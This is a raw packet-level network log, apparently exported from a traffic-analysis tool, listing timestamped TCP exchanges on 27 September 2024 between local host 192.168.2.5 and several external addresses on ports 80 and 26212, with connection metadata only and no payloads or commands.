Sep 27, 2024 04:21:12.907265902 CEST	80	49720	185.215.113.16	192.168.2.5
Sep 27, 2024 04:21:12.907278061 CEST	80	49720	185.215.113.16	192.168.2.5
Sep 27, 2024 04:21:12.907308102 CEST	49720	80	192.168.2.5	185.215.113.16
Sep 27, 2024 04:21:12.907308102 CEST	49720	80	192.168.2.5	185.215.113.16
Sep 27, 2024 04:21:12.907308102 CEST	49720	80	192.168.2.5	185.215.113.16
Sep 27, 2024 04:21:12.907402039 CEST	49720	80	192.168.2.5	185.215.113.16
Sep 27, 2024 04:21:12.907744884 CEST	80	49720	185.215.113.16	192.168.2.5
Sep 27, 2024 04:21:12.907756090 CEST	80	49720	185.215.113.16	192.168.2.5
Sep 27, 2024 04:21:12.907768011 CEST	80	49720	185.215.113.16	192.168.2.5
Sep 27, 2024 04:21:12.907826900 CEST	80	49720	185.215.113.16	192.168.2.5
Sep 27, 2024 04:21:12.907838106 CEST	80	49720	185.215.113.16	192.168.2.5
Sep 27, 2024 04:21:12.907849073 CEST	80	49720	185.215.113.16	192.168.2.5
Sep 27, 2024 04:21:12.907874107 CEST	49720	80	192.168.2.5	185.215.113.16
Sep 27, 2024 04:21:12.907874107 CEST	49720	80	192.168.2.5	185.215.113.16
Sep 27, 2024 04:21:12.907874107 CEST	49720	80	192.168.2.5	185.215.113.16
Sep 27, 2024 04:21:12.908464909 CEST	80	49720	185.215.113.16	192.168.2.5
Sep 27, 2024 04:21:12.908477068 CEST	80	49720	185.215.113.16	192.168.2.5
Sep 27, 2024 04:21:12.908488035 CEST	80	49720	185.215.113.16	192.168.2.5
Sep 27, 2024 04:21:12.908520937 CEST	80	49720	185.215.113.16	192.168.2.5
Sep 27, 2024 04:21:12.908531904 CEST	80	49720	185.215.113.16	192.168.2.5
Sep 27, 2024 04:21:12.908544064 CEST	80	49720	185.215.113.16	192.168.2.5
Sep 27, 2024 04:21:12.908545971 CEST	49720	80	192.168.2.5	185.215.113.16
Sep 27, 2024 04:21:12.908545971 CEST	49720	80	192.168.2.5	185.215.113.16
Sep 27, 2024 04:21:12.908545971 CEST	49720	80	192.168.2.5	185.215.113.16
Sep 27, 2024 04:21:12.908557892 CEST	80	49720	185.215.113.16	192.168.2.5
Sep 27, 2024 04:21:12.908602953 CEST	49720	80	192.168.2.5	185.215.113.16
Sep 27, 2024 04:21:12.908602953 CEST	49720	80	192.168.2.5	185.215.113.16
Sep 27, 2024 04:21:12.908622026 CEST	80	49720	185.215.113.16	192.168.2.5
Sep 27, 2024 04:21:12.908694029 CEST	49720	80	192.168.2.5	185.215.113.16
Sep 27, 2024 04:21:12.908694029 CEST	49720	80	192.168.2.5	185.215.113.16
Sep 27, 2024 04:21:12.909190893 CEST	80	49720	185.215.113.16	192.168.2.5
Sep 27, 2024 04:21:12.909231901 CEST	80	49720	185.215.113.16	192.168.2.5
Sep 27, 2024 04:21:12.909243107 CEST	80	49720	185.215.113.16	192.168.2.5
Sep 27, 2024 04:21:12.909269094 CEST	49720	80	192.168.2.5	185.215.113.16
Sep 27, 2024 04:21:12.909269094 CEST	49720	80	192.168.2.5	185.215.113.16
Sep 27, 2024 04:21:12.909271955 CEST	80	49720	185.215.113.16	192.168.2.5
Sep 27, 2024 04:21:12.909302950 CEST	49720	80	192.168.2.5	185.215.113.16
Sep 27, 2024 04:21:12.909353018 CEST	80	49720	185.215.113.16	192.168.2.5
Sep 27, 2024 04:21:12.909365892 CEST	80	49720	185.215.113.16	192.168.2.5
Sep 27, 2024 04:21:12.909379005 CEST	80	49720	185.215.113.16	192.168.2.5
Sep 27, 2024 04:21:12.909389973 CEST	49720	80	192.168.2.5	185.215.113.16
Sep 27, 2024 04:21:12.909389973 CEST	49720	80	192.168.2.5	185.215.113.16
Sep 27, 2024 04:21:12.909390926 CEST	80	49720	185.215.113.16	192.168.2.5
Sep 27, 2024 04:21:12.909599066 CEST	49720	80	192.168.2.5	185.215.113.16
Sep 27, 2024 04:21:12.909599066 CEST	49720	80	192.168.2.5	185.215.113.16
Sep 27, 2024 04:21:12.910063028 CEST	80	49720	185.215.113.16	192.168.2.5
Sep 27, 2024 04:21:12.910118103 CEST	80	49720	185.215.113.16	192.168.2.5
Sep 27, 2024 04:21:12.910129070 CEST	80	49720	185.215.113.16	192.168.2.5
Sep 27, 2024 04:21:12.910192013 CEST	49720	80	192.168.2.5	185.215.113.16
Sep 27, 2024 04:21:12.910192013 CEST	49720	80	192.168.2.5	185.215.113.16
Sep 27, 2024 04:21:12.910218000 CEST	80	49720	185.215.113.16	192.168.2.5
Sep 27, 2024 04:21:12.910232067 CEST	80	49720	185.215.113.16	192.168.2.5
Sep 27, 2024 04:21:12.910410881 CEST	49720	80	192.168.2.5	185.215.113.16
Sep 27, 2024 04:21:12.911068916 CEST	80	49720	185.215.113.16	192.168.2.5
Sep 27, 2024 04:21:12.911345959 CEST	49720	80	192.168.2.5	185.215.113.16
Sep 27, 2024 04:21:13.030594110 CEST	80	49720	185.215.113.16	192.168.2.5
Sep 27, 2024 04:21:13.030611992 CEST	80	49720	185.215.113.16	192.168.2.5
Sep 27, 2024 04:21:13.030637026 CEST	80	49720	185.215.113.16	192.168.2.5
Sep 27, 2024 04:21:13.030644894 CEST	49720	80	192.168.2.5	185.215.113.16
Sep 27, 2024 04:21:13.030647993 CEST	80	49720	185.215.113.16	192.168.2.5
Sep 27, 2024 04:21:13.030667067 CEST	80	49720	185.215.113.16	192.168.2.5
Sep 27, 2024 04:21:13.030679941 CEST	80	49720	185.215.113.16	192.168.2.5
Sep 27, 2024 04:21:13.030699968 CEST	80	49720	185.215.113.16	192.168.2.5
Sep 27, 2024 04:21:13.030716896 CEST	80	49720	185.215.113.16	192.168.2.5
Sep 27, 2024 04:21:13.030730009 CEST	80	49720	185.215.113.16	192.168.2.5
Sep 27, 2024 04:21:13.030742884 CEST	80	49720	185.215.113.16	192.168.2.5
Sep 27, 2024 04:21:13.030742884 CEST	49720	80	192.168.2.5	185.215.113.16
Sep 27, 2024 04:21:13.030742884 CEST	49720	80	192.168.2.5	185.215.113.16
Sep 27, 2024 04:21:13.030742884 CEST	49720	80	192.168.2.5	185.215.113.16
Sep 27, 2024 04:21:13.030766964 CEST	49720	80	192.168.2.5	185.215.113.16
Sep 27, 2024 04:21:13.030797958 CEST	80	49720	185.215.113.16	192.168.2.5
Sep 27, 2024 04:21:13.030812025 CEST	80	49720	185.215.113.16	192.168.2.5
Sep 27, 2024 04:21:13.030822992 CEST	49720	80	192.168.2.5	185.215.113.16
Sep 27, 2024 04:21:13.030857086 CEST	49720	80	192.168.2.5	185.215.113.16
Sep 27, 2024 04:21:13.030857086 CEST	49720	80	192.168.2.5	185.215.113.16
Sep 27, 2024 04:21:13.030875921 CEST	80	49720	185.215.113.16	192.168.2.5
Sep 27, 2024 04:21:13.030896902 CEST	80	49720	185.215.113.16	192.168.2.5
Sep 27, 2024 04:21:13.030909061 CEST	80	49720	185.215.113.16	192.168.2.5
Sep 27, 2024 04:21:13.030921936 CEST	49720	80	192.168.2.5	185.215.113.16
Sep 27, 2024 04:21:13.031029940 CEST	80	49720	185.215.113.16	192.168.2.5
Sep 27, 2024 04:21:13.031042099 CEST	80	49720	185.215.113.16	192.168.2.5
Sep 27, 2024 04:21:13.031055927 CEST	80	49720	185.215.113.16	192.168.2.5
Sep 27, 2024 04:21:13.031064987 CEST	80	49720	185.215.113.16	192.168.2.5
Sep 27, 2024 04:21:13.031106949 CEST	49720	80	192.168.2.5	185.215.113.16
Sep 27, 2024 04:21:13.031106949 CEST	49720	80	192.168.2.5	185.215.113.16
Sep 27, 2024 04:21:13.031106949 CEST	49720	80	192.168.2.5	185.215.113.16
Sep 27, 2024 04:21:13.031147003 CEST	80	49720	185.215.113.16	192.168.2.5
Sep 27, 2024 04:21:13.031158924 CEST	80	49720	185.215.113.16	192.168.2.5
Sep 27, 2024 04:21:13.031169891 CEST	80	49720	185.215.113.16	192.168.2.5
Sep 27, 2024 04:21:13.031232119 CEST	80	49720	185.215.113.16	192.168.2.5
Sep 27, 2024 04:21:13.031244040 CEST	80	49720	185.215.113.16	192.168.2.5
Sep 27, 2024 04:21:13.031270027 CEST	49720	80	192.168.2.5	185.215.113.16
Sep 27, 2024 04:21:13.031270027 CEST	49720	80	192.168.2.5	185.215.113.16
Sep 27, 2024 04:21:13.031270027 CEST	49720	80	192.168.2.5	185.215.113.16
Sep 27, 2024 04:21:13.031310081 CEST	80	49720	185.215.113.16	192.168.2.5
Sep 27, 2024 04:21:13.031322956 CEST	80	49720	185.215.113.16	192.168.2.5
Sep 27, 2024 04:21:13.031336069 CEST	80	49720	185.215.113.16	192.168.2.5
Sep 27, 2024 04:21:13.031352043 CEST	49720	80	192.168.2.5	185.215.113.16
Sep 27, 2024 04:21:13.031352043 CEST	49720	80	192.168.2.5	185.215.113.16
Sep 27, 2024 04:21:13.031402111 CEST	80	49720	185.215.113.16	192.168.2.5
Sep 27, 2024 04:21:13.031404018 CEST	49720	80	192.168.2.5	185.215.113.16
Sep 27, 2024 04:21:13.031415939 CEST	80	49720	185.215.113.16	192.168.2.5
Sep 27, 2024 04:21:13.031428099 CEST	80	49720	185.215.113.16	192.168.2.5
Sep 27, 2024 04:21:13.031452894 CEST	80	49720	185.215.113.16	192.168.2.5
Sep 27, 2024 04:21:13.031478882 CEST	49720	80	192.168.2.5	185.215.113.16
Sep 27, 2024 04:21:13.031478882 CEST	49720	80	192.168.2.5	185.215.113.16
Sep 27, 2024 04:21:13.031501055 CEST	80	49720	185.215.113.16	192.168.2.5
Sep 27, 2024 04:21:13.031513929 CEST	80	49720	185.215.113.16	192.168.2.5
Sep 27, 2024 04:21:13.031524897 CEST	80	49720	185.215.113.16	192.168.2.5
Sep 27, 2024 04:21:13.031558990 CEST	49720	80	192.168.2.5	185.215.113.16
Sep 27, 2024 04:21:13.031558990 CEST	49720	80	192.168.2.5	185.215.113.16
Sep 27, 2024 04:21:13.031558990 CEST	49720	80	192.168.2.5	185.215.113.16
Sep 27, 2024 04:21:13.031594992 CEST	80	49720	185.215.113.16	192.168.2.5
Sep 27, 2024 04:21:13.031605005 CEST	80	49720	185.215.113.16	192.168.2.5
Sep 27, 2024 04:21:13.031673908 CEST	80	49720	185.215.113.16	192.168.2.5
Sep 27, 2024 04:21:13.031685114 CEST	80	49720	185.215.113.16	192.168.2.5
Sep 27, 2024 04:21:13.031697989 CEST	80	49720	185.215.113.16	192.168.2.5
Sep 27, 2024 04:21:13.031709909 CEST	80	49720	185.215.113.16	192.168.2.5
Sep 27, 2024 04:21:13.031738997 CEST	49720	80	192.168.2.5	185.215.113.16
Sep 27, 2024 04:21:13.031738997 CEST	49720	80	192.168.2.5	185.215.113.16
Sep 27, 2024 04:21:13.031738997 CEST	49720	80	192.168.2.5	185.215.113.16
Sep 27, 2024 04:21:13.031807899 CEST	80	49720	185.215.113.16	192.168.2.5
Sep 27, 2024 04:21:13.031820059 CEST	80	49720	185.215.113.16	192.168.2.5
Sep 27, 2024 04:21:13.031827927 CEST	49720	80	192.168.2.5	185.215.113.16
Sep 27, 2024 04:21:13.031835079 CEST	80	49720	185.215.113.16	192.168.2.5
Sep 27, 2024 04:21:13.031847954 CEST	80	49720	185.215.113.16	192.168.2.5
Sep 27, 2024 04:21:13.031874895 CEST	49720	80	192.168.2.5	185.215.113.16
Sep 27, 2024 04:21:13.031874895 CEST	49720	80	192.168.2.5	185.215.113.16
Sep 27, 2024 04:21:13.031874895 CEST	49720	80	192.168.2.5	185.215.113.16
Sep 27, 2024 04:21:13.031891108 CEST	49720	80	192.168.2.5	185.215.113.16
Sep 27, 2024 04:21:13.031908989 CEST	80	49720	185.215.113.16	192.168.2.5
Sep 27, 2024 04:21:13.031920910 CEST	80	49720	185.215.113.16	192.168.2.5
Sep 27, 2024 04:21:13.031959057 CEST	80	49720	185.215.113.16	192.168.2.5
Sep 27, 2024 04:21:13.031960011 CEST	49720	80	192.168.2.5	185.215.113.16
Sep 27, 2024 04:21:13.031960011 CEST	49720	80	192.168.2.5	185.215.113.16
Sep 27, 2024 04:21:13.032027960 CEST	80	49720	185.215.113.16	192.168.2.5
Sep 27, 2024 04:21:13.032040119 CEST	80	49720	185.215.113.16	192.168.2.5
Sep 27, 2024 04:21:13.032049894 CEST	80	49720	185.215.113.16	192.168.2.5
Sep 27, 2024 04:21:13.032069921 CEST	80	49720	185.215.113.16	192.168.2.5
Sep 27, 2024 04:21:13.032149076 CEST	80	49720	185.215.113.16	192.168.2.5
Sep 27, 2024 04:21:13.032165051 CEST	80	49720	185.215.113.16	192.168.2.5
Sep 27, 2024 04:21:13.032165051 CEST	49720	80	192.168.2.5	185.215.113.16
Sep 27, 2024 04:21:13.032165051 CEST	49720	80	192.168.2.5	185.215.113.16
Sep 27, 2024 04:21:13.032177925 CEST	80	49720	185.215.113.16	192.168.2.5
Sep 27, 2024 04:21:13.032357931 CEST	49720	80	192.168.2.5	185.215.113.16
Sep 27, 2024 04:21:13.032357931 CEST	49720	80	192.168.2.5	185.215.113.16
Sep 27, 2024 04:21:13.035568953 CEST	80	49720	185.215.113.16	192.168.2.5
Sep 27, 2024 04:21:13.035609961 CEST	80	49720	185.215.113.16	192.168.2.5
Sep 27, 2024 04:21:13.035623074 CEST	80	49720	185.215.113.16	192.168.2.5
Sep 27, 2024 04:21:13.035635948 CEST	80	49720	185.215.113.16	192.168.2.5
Sep 27, 2024 04:21:13.035666943 CEST	49720	80	192.168.2.5	185.215.113.16
Sep 27, 2024 04:21:13.035666943 CEST	49720	80	192.168.2.5	185.215.113.16
Sep 27, 2024 04:21:13.035666943 CEST	49720	80	192.168.2.5	185.215.113.16
Sep 27, 2024 04:21:13.035696030 CEST	80	49720	185.215.113.16	192.168.2.5
Sep 27, 2024 04:21:13.035708904 CEST	80	49720	185.215.113.16	192.168.2.5
Sep 27, 2024 04:21:13.035722971 CEST	80	49720	185.215.113.16	192.168.2.5
Sep 27, 2024 04:21:13.035734892 CEST	80	49720	185.215.113.16	192.168.2.5
Sep 27, 2024 04:21:13.035763025 CEST	80	49720	185.215.113.16	192.168.2.5
Sep 27, 2024 04:21:13.035795927 CEST	49720	80	192.168.2.5	185.215.113.16
Sep 27, 2024 04:21:13.035795927 CEST	49720	80	192.168.2.5	185.215.113.16
Sep 27, 2024 04:21:13.035795927 CEST	49720	80	192.168.2.5	185.215.113.16
Sep 27, 2024 04:21:13.035840988 CEST	80	49720	185.215.113.16	192.168.2.5
Sep 27, 2024 04:21:13.035854101 CEST	80	49720	185.215.113.16	192.168.2.5
Sep 27, 2024 04:21:13.035865068 CEST	80	49720	185.215.113.16	192.168.2.5
Sep 27, 2024 04:21:13.035876989 CEST	80	49720	185.215.113.16	192.168.2.5
Sep 27, 2024 04:21:13.035888910 CEST	80	49720	185.215.113.16	192.168.2.5
Sep 27, 2024 04:21:13.035914898 CEST	49720	80	192.168.2.5	185.215.113.16
Sep 27, 2024 04:21:13.035914898 CEST	49720	80	192.168.2.5	185.215.113.16
Sep 27, 2024 04:21:13.035990953 CEST	80	49720	185.215.113.16	192.168.2.5
Sep 27, 2024 04:21:13.036043882 CEST	80	49720	185.215.113.16	192.168.2.5
Sep 27, 2024 04:21:13.036056042 CEST	80	49720	185.215.113.16	192.168.2.5
Sep 27, 2024 04:21:13.036077023 CEST	49720	80	192.168.2.5	185.215.113.16
Sep 27, 2024 04:21:13.036077023 CEST	49720	80	192.168.2.5	185.215.113.16
Sep 27, 2024 04:21:13.036077023 CEST	49720	80	192.168.2.5	185.215.113.16
Sep 27, 2024 04:21:13.036092043 CEST	80	49720	185.215.113.16	192.168.2.5
Sep 27, 2024 04:21:13.036104918 CEST	80	49720	185.215.113.16	192.168.2.5
Sep 27, 2024 04:21:13.036115885 CEST	80	49720	185.215.113.16	192.168.2.5
Sep 27, 2024 04:21:13.036151886 CEST	49720	80	192.168.2.5	185.215.113.16
Sep 27, 2024 04:21:13.036225080 CEST	80	49720	185.215.113.16	192.168.2.5
Sep 27, 2024 04:21:13.036237001 CEST	80	49720	185.215.113.16	192.168.2.5
Sep 27, 2024 04:21:13.036248922 CEST	80	49720	185.215.113.16	192.168.2.5
Sep 27, 2024 04:21:13.036289930 CEST	49720	80	192.168.2.5	185.215.113.16
Sep 27, 2024 04:21:13.036289930 CEST	49720	80	192.168.2.5	185.215.113.16
Sep 27, 2024 04:21:13.036289930 CEST	49720	80	192.168.2.5	185.215.113.16
Sep 27, 2024 04:21:13.036319971 CEST	80	49720	185.215.113.16	192.168.2.5
Sep 27, 2024 04:21:13.036333084 CEST	80	49720	185.215.113.16	192.168.2.5
Sep 27, 2024 04:21:13.036345005 CEST	80	49720	185.215.113.16	192.168.2.5
Sep 27, 2024 04:21:13.036355972 CEST	80	49720	185.215.113.16	192.168.2.5
Sep 27, 2024 04:21:13.036370993 CEST	49720	80	192.168.2.5	185.215.113.16
Sep 27, 2024 04:21:13.036370993 CEST	49720	80	192.168.2.5	185.215.113.16
Sep 27, 2024 04:21:13.036437988 CEST	80	49720	185.215.113.16	192.168.2.5
Sep 27, 2024 04:21:13.036485910 CEST	80	49720	185.215.113.16	192.168.2.5
Sep 27, 2024 04:21:13.036499977 CEST	80	49720	185.215.113.16	192.168.2.5
Sep 27, 2024 04:21:13.036513090 CEST	49720	80	192.168.2.5	185.215.113.16
Sep 27, 2024 04:21:13.036513090 CEST	49720	80	192.168.2.5	185.215.113.16
Sep 27, 2024 04:21:13.036593914 CEST	80	49720	185.215.113.16	192.168.2.5
Sep 27, 2024 04:21:13.036607981 CEST	80	49720	185.215.113.16	192.168.2.5
Sep 27, 2024 04:21:13.036621094 CEST	80	49720	185.215.113.16	192.168.2.5
Sep 27, 2024 04:21:13.036627054 CEST	49720	80	192.168.2.5	185.215.113.16
Sep 27, 2024 04:21:13.036627054 CEST	49720	80	192.168.2.5	185.215.113.16
Sep 27, 2024 04:21:13.036627054 CEST	49720	80	192.168.2.5	185.215.113.16
Sep 27, 2024 04:21:13.036636114 CEST	80	49720	185.215.113.16	192.168.2.5
Sep 27, 2024 04:21:13.036675930 CEST	49720	80	192.168.2.5	185.215.113.16
Sep 27, 2024 04:21:13.036675930 CEST	49720	80	192.168.2.5	185.215.113.16
Sep 27, 2024 04:21:13.036675930 CEST	49720	80	192.168.2.5	185.215.113.16
Sep 27, 2024 04:21:13.089144945 CEST	49721	80	192.168.2.5	185.215.113.26
Sep 27, 2024 04:21:13.093934059 CEST	80	49721	185.215.113.26	192.168.2.5
Sep 27, 2024 04:21:13.094012022 CEST	49721	80	192.168.2.5	185.215.113.26
Sep 27, 2024 04:21:13.094140053 CEST	49721	80	192.168.2.5	185.215.113.26
Sep 27, 2024 04:21:13.098952055 CEST	80	49721	185.215.113.26	192.168.2.5
Sep 27, 2024 04:21:13.116631031 CEST	80	49720	185.215.113.16	192.168.2.5
Sep 27, 2024 04:21:13.116646051 CEST	80	49720	185.215.113.16	192.168.2.5
Sep 27, 2024 04:21:13.116657972 CEST	80	49720	185.215.113.16	192.168.2.5
Sep 27, 2024 04:21:13.116698980 CEST	49720	80	192.168.2.5	185.215.113.16
Sep 27, 2024 04:21:13.116698980 CEST	49720	80	192.168.2.5	185.215.113.16
Sep 27, 2024 04:21:13.398376942 CEST	49714	26212	192.168.2.5	95.179.250.45
Sep 27, 2024 04:21:13.404449940 CEST	26212	49714	95.179.250.45	192.168.2.5
Sep 27, 2024 04:21:13.441564083 CEST	49722	80	192.168.2.5	185.215.113.17
Sep 27, 2024 04:21:13.448715925 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:13.448791981 CEST	49722	80	192.168.2.5	185.215.113.17
Sep 27, 2024 04:21:13.448975086 CEST	49722	80	192.168.2.5	185.215.113.17
Sep 27, 2024 04:21:13.455471039 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:13.595031023 CEST	26212	49714	95.179.250.45	192.168.2.5
Sep 27, 2024 04:21:13.595057011 CEST	26212	49714	95.179.250.45	192.168.2.5
Sep 27, 2024 04:21:13.595067024 CEST	26212	49714	95.179.250.45	192.168.2.5
Sep 27, 2024 04:21:13.595084906 CEST	26212	49714	95.179.250.45	192.168.2.5
Sep 27, 2024 04:21:13.595189095 CEST	49714	26212	192.168.2.5	95.179.250.45
Sep 27, 2024 04:21:13.595189095 CEST	49714	26212	192.168.2.5	95.179.250.45
Sep 27, 2024 04:21:13.595211029 CEST	26212	49714	95.179.250.45	192.168.2.5
Sep 27, 2024 04:21:13.595225096 CEST	26212	49714	95.179.250.45	192.168.2.5
Sep 27, 2024 04:21:13.595263004 CEST	49714	26212	192.168.2.5	95.179.250.45
Sep 27, 2024 04:21:13.771240950 CEST	49720	80	192.168.2.5	185.215.113.16
Sep 27, 2024 04:21:13.771632910 CEST	49723	80	192.168.2.5	185.215.113.16
Sep 27, 2024 04:21:13.776983023 CEST	80	49720	185.215.113.16	192.168.2.5
Sep 27, 2024 04:21:13.777018070 CEST	80	49723	185.215.113.16	192.168.2.5
Sep 27, 2024 04:21:13.777041912 CEST	49720	80	192.168.2.5	185.215.113.16
Sep 27, 2024 04:21:13.777144909 CEST	49723	80	192.168.2.5	185.215.113.16
Sep 27, 2024 04:21:13.777290106 CEST	49723	80	192.168.2.5	185.215.113.16
Sep 27, 2024 04:21:13.782269955 CEST	80	49723	185.215.113.16	192.168.2.5
Sep 27, 2024 04:21:13.800390959 CEST	80	49721	185.215.113.26	192.168.2.5
Sep 27, 2024 04:21:13.800458908 CEST	49721	80	192.168.2.5	185.215.113.26
Sep 27, 2024 04:21:13.801392078 CEST	49721	80	192.168.2.5	185.215.113.26
Sep 27, 2024 04:21:13.806195021 CEST	80	49721	185.215.113.26	192.168.2.5
Sep 27, 2024 04:21:13.817728043 CEST	49714	26212	192.168.2.5	95.179.250.45
Sep 27, 2024 04:21:13.822701931 CEST	26212	49714	95.179.250.45	192.168.2.5
Sep 27, 2024 04:21:14.011305094 CEST	26212	49714	95.179.250.45	192.168.2.5
Sep 27, 2024 04:21:14.032385111 CEST	80	49721	185.215.113.26	192.168.2.5
Sep 27, 2024 04:21:14.032502890 CEST	49721	80	192.168.2.5	185.215.113.26
Sep 27, 2024 04:21:14.082077026 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:14.083125114 CEST	49714	26212	192.168.2.5	95.179.250.45
Sep 27, 2024 04:21:14.086992979 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:14.087063074 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:14.087455988 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:14.092336893 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:14.167699099 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:14.167767048 CEST	49722	80	192.168.2.5	185.215.113.17
Sep 27, 2024 04:21:14.176244974 CEST	49714	26212	192.168.2.5	95.179.250.45
Sep 27, 2024 04:21:14.179357052 CEST	49722	80	192.168.2.5	185.215.113.17
Sep 27, 2024 04:21:14.181232929 CEST	26212	49714	95.179.250.45	192.168.2.5
Sep 27, 2024 04:21:14.184179068 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:14.369162083 CEST	26212	49714	95.179.250.45	192.168.2.5
Sep 27, 2024 04:21:14.411206961 CEST	49714	26212	192.168.2.5	95.179.250.45
Sep 27, 2024 04:21:14.482192039 CEST	49714	26212	192.168.2.5	95.179.250.45
Sep 27, 2024 04:21:14.487076998 CEST	26212	49714	95.179.250.45	192.168.2.5
Sep 27, 2024 04:21:14.490046978 CEST	80	49723	185.215.113.16	192.168.2.5
Sep 27, 2024 04:21:14.491667032 CEST	49723	80	192.168.2.5	185.215.113.16
Sep 27, 2024 04:21:14.537872076 CEST	49711	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:14.538491011 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:14.543235064 CEST	80	49711	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:14.543286085 CEST	49711	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:14.543693066 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:14.543822050 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:14.544011116 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:14.548779011 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:14.674274921 CEST	26212	49714	95.179.250.45	192.168.2.5
Sep 27, 2024 04:21:14.682022095 CEST	49714	26212	192.168.2.5	95.179.250.45
Sep 27, 2024 04:21:14.686861992 CEST	26212	49714	95.179.250.45	192.168.2.5
Sep 27, 2024 04:21:14.686952114 CEST	26212	49714	95.179.250.45	192.168.2.5
Sep 27, 2024 04:21:14.686960936 CEST	26212	49714	95.179.250.45	192.168.2.5
Sep 27, 2024 04:21:14.687067032 CEST	26212	49714	95.179.250.45	192.168.2.5
Sep 27, 2024 04:21:14.687076092 CEST	26212	49714	95.179.250.45	192.168.2.5
Sep 27, 2024 04:21:14.687158108 CEST	26212	49714	95.179.250.45	192.168.2.5
Sep 27, 2024 04:21:14.971020937 CEST	26212	49714	95.179.250.45	192.168.2.5
Sep 27, 2024 04:21:14.973067045 CEST	49714	26212	192.168.2.5	95.179.250.45
Sep 27, 2024 04:21:14.979063034 CEST	26212	49714	95.179.250.45	192.168.2.5
Sep 27, 2024 04:21:14.987613916 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:14.987627029 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:14.987690926 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:14.987731934 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:14.987782001 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:14.987795115 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:14.987807035 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:14.987818956 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:14.987823009 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:14.987832069 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:14.987844944 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:14.987855911 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:14.987875938 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:14.987910986 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:14.987948895 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:14.987962961 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:14.988003969 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:14.993784904 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:14.993838072 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:15.042802095 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.042819023 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.042886972 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:15.107345104 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.107364893 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.107377052 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.107397079 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.107450008 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:15.107502937 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:15.107739925 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.107796907 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:15.107903004 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.107919931 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.107971907 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:15.108129978 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.108177900 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:15.108515024 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.108530998 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.108549118 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.108565092 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:15.108591080 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:15.108706951 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.108753920 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:15.108875990 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.108927011 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:15.109606981 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.109762907 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:15.109797001 CEST	80	49724	176.113.115.95	192.168.2.5
